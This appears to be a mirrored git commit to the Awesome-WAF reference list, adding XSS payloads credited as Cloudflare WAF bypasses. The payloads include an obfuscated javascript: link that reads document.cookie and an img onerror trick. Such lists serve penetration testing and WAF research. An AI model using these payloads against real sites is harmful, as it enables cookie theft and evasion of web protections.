mirror of
https://github.com/0xInfection/Awesome-WAF.git
synced 2024-10-01 04:35:35 -04:00
Added a bypass for Cloudflare
This commit is contained in:
parent
e7b9fd4f40
commit
950e42eb3e
@ -1879,14 +1879,14 @@ Before anything else, you should hone up skills from [Google Dorks Cheat Sheet](
|
||||
```
|
||||
|
||||
### Cloudflare
|
||||
- XSS Bypass by [@s0md3v](https://twitter.com/s0md3v)
|
||||
```
|
||||
<a"/onclick=(confirm)()>ClickHere
|
||||
```
|
||||
- XSS Bypass by [@ArbazKiraak](https://twitter.com/ArbazKiraak)
|
||||
```
|
||||
<a href="j	a	v	asc
ri	pt:\u0061\u006C\u0065\u0072\u0074(this['document']['cookie'])">X</a>`
|
||||
```
|
||||
- XSS Bypass by [@Ahmet Ümit](https://twitter.com/ahmetumitbayram)
|
||||
```
|
||||
<--`<img/src=` onerror=confirm``> --!>
|
||||
```
|
||||
|
||||
### Comodo
|
||||
- SQLi by [@WAFNinja](https://waf.ninja)
|
||||
|
Loading…
Reference in New Issue
Block a user